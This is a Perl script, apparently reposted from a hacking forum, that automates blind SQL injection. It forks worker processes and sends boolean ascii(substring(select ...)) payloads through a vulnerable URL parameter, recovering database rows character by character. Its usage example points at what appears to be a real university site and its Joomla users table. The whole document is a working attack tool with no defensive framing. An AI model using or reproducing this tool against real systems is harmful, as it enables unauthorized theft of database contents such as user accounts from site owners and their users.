Blind SQLi

1. #!/usr/bin/perl
2. use LWP::UserAgent;
3. use HTML::Parse;
4. use HTML::FormatText;
5. use Getopt::Long qw(:config no_ignore_case bundling);
6.  
7. # Blind sql injection.
8.  
9. # COMMANDLINE.
10. GetOptions( 'h=s'=>\$url,'type=s'=>\$type,'p=s'=>\$opt_p,'T=s'=>\$opt_T,'C=s'=>\$opt_C,'threads=i'=>\$threads,'rows=i'=>\$rows );
11.  
12. if ($type ne 'char' && $type ne 'int') { print "\nYou must enter --type: char or int"; &usage; exit; };
13. if (!$opt_p) { print "\nYou must enter the vulnerable paramater."; &usage; exit; };
14. if (!$url || !$opt_T | !$opt_C) { &usage; exit; };
15.  
16. $threads=5 if (!$threads); # default threads
17. $rows=100 if (!$rows); # default rows to get
18.  
19. $start = localtime();
20.  
21. my $ua=new LWP::UserAgent;
22. $ua->timeout(30);
23. my $content=$ua->get($url);
24. my $orig_page=HTML::FormatText->new->format(parse_html($content->content));
25.  
26. print "Started $start\n";
27.  
28. for ($sql_limit=0; $sql_limit<$rows; $sql_limit++)
29. {
30.  
31. @waitlist = (1..1000);
32. $end_of_string=0;
33. my @word;
34.  
35. while (@waitlist) {
36.  
37. for ($count = 0; $count<$threads; $count++) {$current_batch[$count]=shift(@waitlist);}
38.  
39. foreach $letter (@current_batch) {
40. pipe *{$letter},RETHAND;
41. unless ($pid = fork()) {
42. sub1();
43. exit();
44. }
45. }
46.  
47. # wait for returned data
48. autoflush STDOUT 1;
49. foreach $letter (@current_batch) {
50. $response = <$letter>;
51. $end_of_string=1 if ($response==31);
52. $word[$letter]=chr($response);
53. printf "\r%3d %1s",$letter,chr($response);
54. }
55. last if ($end_of_string==1); # end of string - exit loop
56. }
57. print "\n\n";
58. foreach (@word) {
59. print "$_";
60. }
61. print "\n\n";
62. last if (ord($word[1])==31); # no more rows - exit loop
63. } # increase row / limit
64. $end = localtime();
65. print "\n\nCompleted $end\n";
66.  
67.  
68.  
69. sub sub1 {
70. if (defined $letter) {
71. my ($lower,$upper)=(31,123);
72. while ($upper-$lower>1) {
73. my $diff=($upper-$lower)/2;
74. $diff=int($diff + .5);
75. $diff+=$lower;
76. $ua=new LWP::UserAgent;
77. $ua->timeout(15);
78. $url=~m/(.+[&|\?]$opt_p=.+?)(&.+)/i;
79. if ($1) {
80. if ($type eq 'int') {
81. $content=$ua->get($1 . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . $2);
82. } else {
83. $content=$ua->get($1 . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1' . $2);
84. }
85. } else {
86. if ($type eq 'int') {
87. $content=$ua->get($url . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff);
88. } else {
89. $content=$ua->get($url . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1');
90. }
91. }
92. $content=HTML::FormatText->new->format(parse_html($content->content));
93. #($content!~m/A4583SL/)?$upper=$diff:$lower=$diff;
94. ($content ne $orig_page)?$upper=$diff:$lower=$diff;1
95.  
96. }
97. print RETHAND "$lower\n";
98.  
99. }
100. }
101.  
102. sub usage
103. {
104. print "\n";
105. print "\nUSAGE : $0 [-h URL] [-p vuln p.] [--type int|char] [-T table name] [-C column name]\n";
106. print "\n-h = Host address.";
107. print "\n-p = Vulnerable parameter.";
108. print "\n--type = vulnerable parameter type; int or char.";
109. print "\n-T = Table name.";
110. print "\n-C = Column name.";
111. print "\n--threads = [optional] number of threads, default is 5";
112. print "\n--rows = [optional] number of rows to dump, default is 100";
113. print "\n\nEg usage: perl $0 -h \"http://www.cs.teiher.gr/index.php?option=com_juser&task=show_bio&id=88&lang=en\" -T jos_users -C username --type int -p id";
114. print "\n\n\n";
115. }
116.  
117. Read more: http://www.ubers.org/Thread-PERL-Blind-SQLi#ixzz3Cm0YlqHk